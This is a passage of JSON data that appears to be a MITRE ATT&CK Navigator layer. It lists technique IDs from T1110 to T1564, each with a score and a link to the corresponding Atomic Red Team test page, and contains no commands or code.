003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob
/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.
001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T
1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic
-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.0
02.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techn
iqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546
.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1
546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/
master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-r
ed-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/red
canaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://gith
ub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":
